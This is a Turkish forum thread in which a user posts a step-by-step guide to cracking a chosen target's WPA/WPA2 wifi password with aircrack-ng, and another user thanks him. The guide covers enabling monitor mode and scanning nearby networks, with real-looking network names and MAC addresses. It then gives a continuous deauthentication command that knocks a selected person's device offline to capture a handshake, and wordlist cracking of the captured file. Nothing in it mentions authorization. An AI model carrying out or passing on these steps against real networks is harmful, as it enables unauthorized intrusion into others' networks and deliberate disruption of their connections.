Gönderen Konu: Aircrack-ng kullanımı ( hedef wifi hackleme )  (Okunma sayısı 138 defa)

GHH

  • Araştırmacı-S1
  • *
  • İleti: 13
    • Profili Görüntüle
Aircrack-ng kullanımı ( hedef wifi hackleme )
« : 04 Temmuz 2019, 16:59:53 »
Selamın aleyküm ben GHH size Aircrack kullanımını göstereceğim Aircrack bir çok işe yarar bluetooth cihazlarını hacklemede wifi hacklemede v.b kullanılır bilirmisiniz bilmem ama cyber ninja diye bir çocuk var 13-14 yaşlarında kendisi yabancı ve bu şekilde drone hackliyor falan drone hacklemek öğrenince çok basit hadi başlayalım umarım anlatmışımdır iyi hatam olduysa aff ola :)

Aircrack-ng nedir? Aircrack-ng, algılayıcı, paket sezici, 802.11 telsiz LAN için WEP ve WPA/WPA2-PSK çözücü ve analiz aracından oluşan ağ yazılım takımıdır.802.11a, 802.11b ve 802.11g trafiği sezebilen bir araçtır.Yani kısacası Wireless Hacking Tools olarak adlandırabiliriz.
Bu tool ile:
1.Ağ trafiğini sezebiliriz.

2.Dinlediğimiz ağdan paket yakalayabiliriz.

3.Modeme bağlı olan bir aracın modeme bağlanmasını engelleyebiliriz.

4.WEP ve WPA şifre kırabiliriz.
Not : Yazıları internetten kodum özellikler ve aircrack-ng nedir olan yerler.

Eyer tool sizde yoksa şu komut ile indirebilirsiniz:

apt-get install aircrack-ng

Öncelikle sistemde root olarak yapacağız bu işlemi o yüzden şu komutu girelim: "sudo su" tırkan işaretleri olmadan.Ardından şifrenizi yazacaksınız ve root olcaksınız.

Aircrack-ng ile wifi hackleme:
Not:Bize gerekenler bir tane wifi şifreleri içeren wordlists.txt bunu internetten bulabilirsiniz.

1.adım:Wireless kartınızı  şu komutla öğrenenmeniz gerekli :

ifconfig

ardındaın önünüze bir yazı cıkacaktır benim wireles kartım wlan0 şu şekilde yani:

eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:23:ae:37:43:1e  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 18

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 427287  bytes 505200926 (481.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 427287  bytes 505200926 (481.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet ip adresim vardı  netmask gizli  broadcast gizli
        inet6 fe80::6236:ddff:fed4:ef40  prefixlen 64  scopeid 0x20<link>
        ether 60:36:dd:d4:ef:40  txqueuelen 1000  (Ethernet)
        RX packets 1481501  bytes 1780403162 (1.6 GiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 818889  bytes 121191367 (115.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
yani burda ip adresniz yazan yerin hemen yanındaki sizin wireless kartınızın adıdır benki wlan0 o yüzden genelde wlan0 dır.

2.adım:wireles kartınızı öğrendiğinize göre şimdi wireless kartımızı modeme dönüştüreceğiz unutmayın wireless kartınız modeme dönüştüğü zaman internet olmayacaktır.
Wireless kartını modeme dönüştürme komutu:airmon-ng start wlan0

bunu yazdıktan sonra karşınıza wlan0mon yada wireless kartınızın adı ve mon0 çıkar eyer mon2 yada başkası çıkarsa sorun yok korkmayın mon0 demek benim kartım monitör modunda 0 da çalışıyor sizinki 2-3-4-5-6 fark etmez normal bişeydir bu.

3.adım:şimdi çevremizde bulunan ağları listeleyeceğiz:
komut:airodump-ng wlan0mon (unutmayın siz kendi wireles kartınızı yazacaksınız ben wlan0mon yazdım çünkü benimki wlan0)

önünüze şöyle bir yazı çıkacaktır:

CH  8 ][ Elapsed: 0 s ][ 2019-07-04 15:47                                     
                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                               
 6A:EC:A3:80:51:7D  -83        4        0    0   5  130  WPA2 CCMP   PSK  ZyXEL
 6A:EC:A3:80:51:7E  -84        4        0    0   5  130  WPA2 CCMP   PSK  ZyXEL
 B8:EC:A3:80:51:7F  -84        4        0    0   5  130  WPA2 CCMP   PSK  ZyXEL
 04:BF:6D:2A:83:43  -88        2        0    0  10  130  WPA2 CCMP   PSK  TTNET
 6A:EC:A3:80:51:7C  -83        8        0    0   5  130  WPA2 CCMP   PSK  ZyXEL
 34:E8:94:01:1C:E8  -75        8        0    0  11  130  WPA2 CCMP   PSK  dsmar
 8C:59:73:FA:6C:C4  -41       16       16    0  11  130  WPA2 CCMP   PSK  ZyXELz
 C4:E9:84:63:E1:DC  -74        8        0    0   7  130  WPA2 CCMP   PSK  hsk  z
 EC:CB:30:C2:2B:C4  -78        7        0    0   2  130  WPA2 CCMP   PSK  ecem
   
Ağları listeledik şimdi CTRL+C yaparak wireless aramasını durduruyoruz.

şimdi karşınızdaki yazılar şu anlama geliyor:
BSSİD:ağın mac adresi
PWR:ağın gücü
DATA:veri demek bende aanlamadım bunu fazla
s:bilmiyom çaktırmayın
CH:ağın yayın yaptığı kanal demek
MB:ağın mb/s hızını gösteriyor sanırım
enc:wpa mı wpa 2 m onu gösteriyor sanırım
cıpher:bilmiiyorum
AUTH ESSİD yada ESSİD:ağın adı demek
Burda kullanacaklarımız BSSİD,CH,ESSİD yada AUTH ESSİD.

4.adım şimdi hedef ağımızı belirleyeceğiz .
komut:airodump-ng -w wifi adı  -c yayın yaptığı kanal --bssid ağın mac adresi ve wireles kartınız
ÖRNEK:airodump-ng -w  ecem -c 2 --bssid EC:CB:30:C2:2B:C4 wlan0mon

5.adım:Şimdi ağı dinlemeye aldık.Gördüğünüz gibi station adreslerimiz var.Bunlar ağımıza bağlı bulunan telefon,bilgisayar vb. aletlerin mac adresleridir. Ağın şifresini çözebilmemiz için bir paket yakalamamız lazım.
bu yüzden ağda bir hedef seçin ve şu koutları yazarak o hedefin internetini kesiceğiz o tekrar bağlandığı zaman paket yakalayacaığz.

hedef şeçme:öncelikle yeni komut satırı açıp şu kodları yazacağız
komut:aireplay-ng -0 0 -a hedef ağın mac adresi -c hedef mac adresi -ignore-negative-one wlan0mon (siz kendi wireless kartınızı yazın)

ÖRNEK:aireplay_ng -0 0 -a EC:CB:30:C2:2B:C4 -c hedef kişinin mac adresi mesela :C3:A7:K9:30:3A:KL -ignore-negative-one wlan0mon

önünüze şöyle bir ayzı çıkacaktır:
https://i.hizliresim.com/QPYpVy.png (bunu ali hocamın sayfasından aldım kendisinle iletişimimn yok sadece hocam diyorum)
ardından ctrl+c yaparak saldırıyı sonlandırın 3-4 saniyne bekledikten sonra ama


şimdi hedef ağdan düşdü bu komut ile şifreyi kırmayyı deneyeceğiz wordlist.txt lağzım.

aircrack-ng -w /root/Desktop/wordlist.txt yakaladığınz dosya yüksek ihtimalle home klasöründedir türkçeys ev kolasöründe

ÖRNEK:aircrack-ng -w /root/Desktop/wordlist.txt.txt yakaladığınız .cap lı dosya örnek: Airtes TTnet.cap

Eyer yazım Hatalım olduysa kusura bakmayınız zaten olmuşdur yüksek ihtimalle.GHH DEN BU KADAR SEVGİLER

https://youtu.be/n2TAiHvsvr0 burda videolu bir şekli var ali hocamız anlatıyor.
Dünya'da hapse girmeden: Devleti eleştire bildiğim yer siber alemdir.Tarafsızım parti yada takım tutmuyorum eşitliği,adaleti,sevgiyi ve barışı savunuyorum.

buld0ger

  • Araştırmacı-S1
  • *
  • İleti: 22
    • Profili Görüntüle
Ynt: Aircrack-ng kullanımı ( hedef wifi hackleme )
« Yanıtla #1 : 05 Temmuz 2019, 05:47:01 »
eline sağlık yeni ve farklı bır konu